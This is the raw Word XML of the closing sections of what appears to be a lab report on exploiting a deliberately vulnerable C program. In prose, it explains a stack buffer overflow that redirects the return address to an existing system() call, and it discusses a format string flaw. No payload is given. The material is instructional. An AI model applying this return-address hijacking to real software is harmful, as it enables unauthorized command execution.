        <w:t xml:space="preserve"> 2 exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51296320" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Case 5 calls </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) directly with the program's default Command string. On its own, that path does not provide attacker selected command execution. Its importance is that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) contains the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) call reused by </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the case</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2 exploit. Redirecting execution to this existing function and supplying a controlled argument produced a simpler and more repeatable demonstration than first modifying shared command data and then invoking case 5 separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCCA036" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>PrintfVulnerability(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">), present as case 8 in VulnerableCode_1.c, passes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attacker controlled</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> input directly to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>printf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) as the format string. Format specifiers such as %x and %s can expose process memory, while %n can write a value to an address referenced by the corresponding argument. This represents a separate vulnerability class and does not depend on the stack buffer overflow used in this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B0C70" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRPr="00F339BF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F339BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>9. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7288EFD6" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The completed exploit shows how an unchecked local buffer can be converted into controlled execution of existing program code. Input beyond </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>BufOve[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">14] reaches the saved stack frame data, allowing the saved return address to be replaced with the address of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">). Correct placement of a placeholder </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> slot and an argument pointer then gives </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) the stack layout it expects and allows the chosen command to reach </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">). The most important debugging result was identifying the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>one word</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> difference between entering </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) through a corrupted RET and entering it through a normal CALL. Once that difference was accounted for, the exploit became predictable and reproducible in GDB.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002A57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9750D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="385CA55E"/>
    <w:lvl w:ilvl="0" w:tplc="78E8DB86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="449699AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3B44F33A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="AF54C7DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="37E8379C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DED2E3A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6700E636">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="52BC684E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="01265D76">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="231351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EE"/>
    <w:rsid w:val="002A57EE"/>
    <w:rsid w:val="00324066"/>
    <w:rsid w:val="005A28BC"/>
    <w:rsid w:val="00A166FF"/>
    <w:rsid w:val="00B01F0B"/>
    <w:rsid w:val="00B63132"/>
    <w:rsid w:val="00DC7D85"/>
    <w:rsid w:val="00E950D4"/>
    <w:rsid w:val="00F33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9C31"/>
  <w15:docId w15:val="{20634CC7-6939-4AC4-95A8-94A5AE57C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Lorenzo Ismael Reyes</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2026-09-29T16:07:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-27T23:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-29T16:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>